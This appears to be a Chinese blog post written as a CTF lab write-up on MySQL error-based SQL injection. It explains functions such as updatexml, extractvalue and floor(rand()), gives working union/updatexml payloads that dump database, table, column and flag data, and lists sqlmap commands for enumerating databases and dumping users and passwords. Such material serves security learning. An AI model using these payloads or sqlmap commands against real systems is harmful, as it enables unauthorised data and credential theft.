技能树-Web前置技能-SQL注入-报错注入
报错注入函数
loor函数
select count(*),(floor(rand(0)*2))x from table group by x;
select查询语句
group by进行分组(相同为一组)
rand()生成0到1的随机数
floor()返回整数
count()对数据整合(类似去重)
产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。
参考:http://www.cnblogs.com/sfriend/p/11365999.html
extractvalue函数
限制长度为32位
and extractvalue(1,concat(0x7e,(select user()),0x7e));
该参数接受两个字符串参数,一个xml标记片段和一个xpath表达式,而第二参数要求xpath格式字符串,而我们不是所以报错。
参考:https://www.cnblogs.com/xishaonian/p/6250444.html
updatexml函数
限制长度为32位
and updatexml(1,concat(0x7e,(select user()),0x7e),1)
updatexml(1,2,3)第一个参数是string格式,为xml文档对象的名称,第二个参数为xpath格式的字符串,第三个string格式,替换查找到的符合条件的数据,由于第二个参数要xpath格式的字符串,因为不符合规则所以报错。
参考:http://blog.csdn.net/qq_37873738/article/details/88042610
name_const函数
只可获取数据库的版本信息
exp函数
exp(~(select * from(select user())a))
exp(int)该函数会返回值得x次方结果,当值超过mysql的范围就会爆错,上面payload的意思为:先查询user()的数据取名为a再select * from a将结果集a全部查询出来。
报错函数
报错函数:
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometry collection()
polygon()
multipoint()
multlinestring()
multpolygon()
linestring()
参考:http://www.mamicode.com/info-detail-2366760.html
报错注入
判断注入点
输入1 查询到结果
尝试输入1‘ 出现报错
输入-1查询到结果
发现无论输入什么,都只会回显成功或者错误
能报错,说明存在注入点
爆库名
可以根据updatexml的报错注入来获取信息
1 union select 1,updatexml(1,concat(0x7e,(database()),0x7e),1)
updatexml (string, xpath_string, string)
第一个参数:可以输入1,为XML文档对象的名称
第二个参数:xpath_string ,提取多个子节点的文本
第三个参数:可以输入1,替换查找的符合条件的参数
0x7e是一个代表的十六进制,可以用’%’,或者’’来代替
爆表名
1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(table_name)) from information_schema.tables where table_schema='sqli'),0x7e),1)
爆列名
1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(column_name)) from information_schema.columns where table_name='flag'),0x7e),1)
爆数据
1 union select 1,updatexml(1,concat(0x7e,(select (group_concat(flag)) from sqli.flag),0x7e),1)
自动化sqlmap注入
sqlmap注入
查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1
查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs
获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户
sqlmap.py -u url/?id=1 --users
查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords
查询数据库名称
sqlmap.py -u url/?id=1 --current-db
sqlmap各种注入技术
布尔类型的盲注,根据返回的页面的是或否,来判断对错的注入
时间类型的盲注,无法根据页面返还的信息判断任何信息,利用线程返还sleep(x)的时间,来判断对错的注入
联合查询注入,使用union联合注入
报错注入,根据页面返还错误信息进行注入
标签:sqlmap,0x7e,报错,updatexml,技能,select,注入 From: https://blog.csdn.net/Static______/article/details/137247172